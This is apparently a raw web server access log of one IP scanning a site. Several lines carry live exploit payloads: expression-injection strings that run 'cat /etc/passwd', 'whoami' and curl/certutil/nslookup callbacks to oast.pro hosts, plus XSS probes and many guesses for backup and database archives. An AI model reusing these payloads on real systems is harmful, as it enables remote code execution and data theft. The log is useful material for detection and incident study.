154.12.251.68 - - [20/Mar/2024:12:55:29 +0000] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" 4 - 
154.12.251.68 - - [20/Mar/2024:12:56:00 +0000] "GET /bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script> HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" 4 - 
154.12.251.68 - - [20/Mar/2024:12:57:54 +0000] "GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 301 4331 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:13:03:10 +0000] "GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" 4 - 
154.12.251.68 - - [20/Mar/2024:13:03:26 +0000] "GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22curl%20http://cntdmevqgl1oqsgnk8p0tux6o5hcnxi7j.oast.pro%22%29%7D__::.x/ HTTP/1.1" 301 4472 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:13:03:30 +0000] "GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22certutil%20-urlcache%20-split%20-f%20http://cntdmevqgl1oqsgnk8p0dczgm16bs5sh4.oast.pro%22%29%7D__::.x/ HTTP/1.1" 301 4532 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:13:10:42 +0000] "GET /OA_CGI/FNDWRR.exe HTTP/1.1" 301 4193 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:13:11:42 +0000] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" 4 - 
154.12.251.68 - - [20/Mar/2024:13:11:50 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cntdmevqgl1oqsgnk8p0k37r53qq9cwmd.oast.pro%22%29%7D/ HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 4 - 
154.12.251.68 - - [20/Mar/2024:13:13:36 +0000] "GET /scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 301 4315 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:13:13:40 +0000] "GET /scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 301 4323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:13:36:36 +0000] "GET /cgi-bin/GetSrvInfo.exe HTTP/1.1" 301 4203 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:13:42:53 +0000] "GET /__nuxt_vite_node__/module/C:/Windows/System32/calc.exe HTTP/1.1" 301 4267 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:13:55:24 +0000] "GET /config.php.zip HTTP/1.1" 301 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:22 +0000] "GET /cdnintus4.manageengine.com.zip HTTP/1.1" 301 4219 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:22 +0000] "GET /manageengine.com.zip HTTP/1.1" 301 4199 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:22 +0000] "GET /manageengine.zip HTTP/1.1" 301 4191 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:23 +0000] "GET /cdnintus4.zip HTTP/1.1" 301 4185 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:23 +0000] "GET /2024.zip HTTP/1.1" 301 4175 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:23 +0000] "GET /ROOT.zip HTTP/1.1" 301 4175 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:24 +0000] "GET /wwwroot.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:24 +0000] "GET /htdocs.zip HTTP/1.1" 301 4179 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:24 +0000] "GET /www.zip HTTP/1.1" 301 4173 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:25 +0000] "GET /html.zip HTTP/1.1" 301 4175 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:25 +0000] "GET /web.zip HTTP/1.1" 301 4173 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:25 +0000] "GET /webapps.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:26 +0000] "GET /public.zip HTTP/1.1" 301 4179 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:26 +0000] "GET /public_html.zip HTTP/1.1" 301 4189 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:26 +0000] "GET /uploads.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:27 +0000] "GET /website.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:27 +0000] "GET /api.zip HTTP/1.1" 301 4173 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:27 +0000] "GET /test.zip HTTP/1.1" 301 4175 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:28 +0000] "GET /app.zip HTTP/1.1" 301 4173 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:28 +0000] "GET /backup.zip HTTP/1.1" 301 4179 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:28 +0000] "GET /backup_1.zip HTTP/1.1" 301 4183 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:28 +0000] "GET /backup_2.zip HTTP/1.1" 301 4183 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:29 +0000] "GET /backup_3.zip HTTP/1.1" 301 4183 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:29 +0000] "GET /backup_4.zip HTTP/1.1" 301 4183 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:29 +0000] "GET /backups.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:30 +0000] "GET /bin.zip HTTP/1.1" 301 4173 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:30 +0000] "GET /temp.zip HTTP/1.1" 301 4175 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:30 +0000] "GET /bak.zip HTTP/1.1" 301 4173 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:31 +0000] "GET /db.zip HTTP/1.1" 301 4171 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:31 +0000] "GET /sql.zip HTTP/1.1" 301 4173 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:31 +0000] "GET /dump.zip HTTP/1.1" 301 4175 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:32 +0000] "GET /database.zip HTTP/1.1" 301 4183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:32 +0000] "GET /Release.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:32 +0000] "GET /inetpub.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:33 +0000] "GET /package.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:33 +0000] "GET /tmp.zip HTTP/1.1" 301 4173 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:33 +0000] "GET /db.zip HTTP/1.1" 301 4171 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:34 +0000] "GET /data.zip HTTP/1.1" 301 4175 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:34 +0000] "GET /ftp.zip HTTP/1.1" 301 4173 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:34 +0000] "GET /output.zip HTTP/1.1" 301 4179 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:34 +0000] "GET /admin.zip HTTP/1.1" 301 4177 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:35 +0000] "GET /upload.zip HTTP/1.1" 301 4179 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:35 +0000] "GET /src.zip HTTP/1.1" 301 4173 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:35 +0000] "GET /conf/conf.zip HTTP/1.1" 301 4185 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:11:36 +0000] "GET /old.zip HTTP/1.1" 301 4173 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:49 +0000] "GET /cdnintus4.manageengine.com.sql.zip HTTP/1.1" 301 4227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:50 +0000] "GET /manageengine.com.sql.zip HTTP/1.1" 301 4207 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:50 +0000] "GET /manageengine.sql.zip HTTP/1.1" 301 4199 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:50 +0000] "GET /cdnintus4.sql.zip HTTP/1.1" 301 4193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:51 +0000] "GET /2024.sql.zip HTTP/1.1" 301 4183 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:51 +0000] "GET /ROOT.sql.zip HTTP/1.1" 301 4183 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:51 +0000] "GET /wwwroot.sql.zip HTTP/1.1" 301 4189 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:52 +0000] "GET /htdocs.sql.zip HTTP/1.1" 301 4187 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:52 +0000] "GET /www.sql.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:52 +0000] "GET /html.sql.zip HTTP/1.1" 301 4183 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:53 +0000] "GET /web.sql.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:53 +0000] "GET /webapps.sql.zip HTTP/1.1" 301 4189 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:53 +0000] "GET /public.sql.zip HTTP/1.1" 301 4187 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:54 +0000] "GET /public_html.sql.zip HTTP/1.1" 301 4197 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:54 +0000] "GET /uploads.sql.zip HTTP/1.1" 301 4189 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:54 +0000] "GET /website.sql.zip HTTP/1.1" 301 4189 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:54 +0000] "GET /api.sql.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:55 +0000] "GET /test.sql.zip HTTP/1.1" 301 4183 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:55 +0000] "GET /app.sql.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:55 +0000] "GET /backup.sql.zip HTTP/1.1" 301 4187 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:56 +0000] "GET /backup_1.sql.zip HTTP/1.1" 301 4191 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:56 +0000] "GET /backup_2.sql.zip HTTP/1.1" 301 4191 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:56 +0000] "GET /backup_3.sql.zip HTTP/1.1" 301 4191 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:57 +0000] "GET /backup_4.sql.zip HTTP/1.1" 301 4191 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:57 +0000] "GET /backups.sql.zip HTTP/1.1" 301 4189 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:57 +0000] "GET /bin.sql.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:58 +0000] "GET /temp.sql.zip HTTP/1.1" 301 4183 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:58 +0000] "GET /bak.sql.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:58 +0000] "GET /db.sql.zip HTTP/1.1" 301 4179 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:59 +0000] "GET /sql.sql.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:59 +0000] "GET /dump.sql.zip HTTP/1.1" 301 4183 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" 0 - 
154.12.251.68 - - [20/Mar/2024:14:58:59 +0000] "GET /database.sql.zip HTTP/1.1" 301 4191 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:59:00 +0000] "GET /Release.sql.zip HTTP/1.1" 301 4189 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:59:00 +0000] "GET /inetpub.sql.zip HTTP/1.1" 301 4189 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:59:00 +0000] "GET /package.sql.zip HTTP/1.1" 301 4189 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:59:01 +0000] "GET /tmp.sql.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:59:01 +0000] "GET /db.sql.zip HTTP/1.1" 301 4179 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:59:01 +0000] "GET /data.sql.zip HTTP/1.1" 301 4183 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:59:01 +0000] "GET /ftp.sql.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:59:02 +0000] "GET /output.sql.zip HTTP/1.1" 301 4187 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:59:02 +0000] "GET /admin.sql.zip HTTP/1.1" 301 4185 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 0 - 
